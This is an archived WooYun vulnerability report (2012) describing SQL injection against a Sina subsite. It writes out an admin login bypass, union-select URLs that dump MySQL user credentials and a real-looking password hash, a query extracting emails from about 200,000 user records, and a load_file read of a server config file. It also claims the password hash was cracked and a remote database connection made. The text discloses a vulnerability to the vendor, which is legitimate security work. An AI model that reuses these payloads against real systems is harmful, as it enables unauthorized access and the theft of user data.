当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04528

漏洞标题:新浪后台引发的血案

相关厂商:新浪

漏洞作者: 灰太狼

提交时间:2012-02-15 03:58

修复时间:2012-03-31 03:59

公开时间:2012-03-31 03:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-02-15: 细节已通知厂商并且等待厂商处理中
2012-02-15: 厂商已经确认,细节仅向厂商公开
2012-02-25: 细节向核心白帽子及相关领域专家公开
2012-03-06: 细节向普通白帽子公开
2012-03-16: 细节向实习白帽子公开
2012-03-31: 细节向公众公开

简要描述:

后台直接用admin'or 1=1# 登陆 找到注入点 MYSQL外连

详细说明:

目标站http://bes.sina.net
进入后台 竟然还要账号密码。。开什么玩笑
直接用户名admin' or 1=1#
密码随意写 123456 成功登陆


ok
点来点去 找到个注入点http://bes.sina.net/content_detail.php?content_id=199
之后
http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user--
yaoya:*B30D63E3C0BEE74D8A017AD371EB8810F01093CC:Y:%
可以MYSQL外连
破解了MD5
madwolf
成功连上
数据库还不少啊
http://bes.sina.net/content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23
20W条邮箱啊。。可惜没密码
其他数据库不解释了
写入一句话不成功啊。。貌似目录没权限
读读配置吧
select load_file('/data0/apache/conf/extra/httpd-vhosts.conf')


完结。。
求证书+礼物啊。。

漏洞证明:

http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user--

修复方案:

怎么修复你们懂得

版权声明:转载请注明来源 灰太狼@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-02-15 16:39

厂商回复:

非常感谢

最新状态:

暂无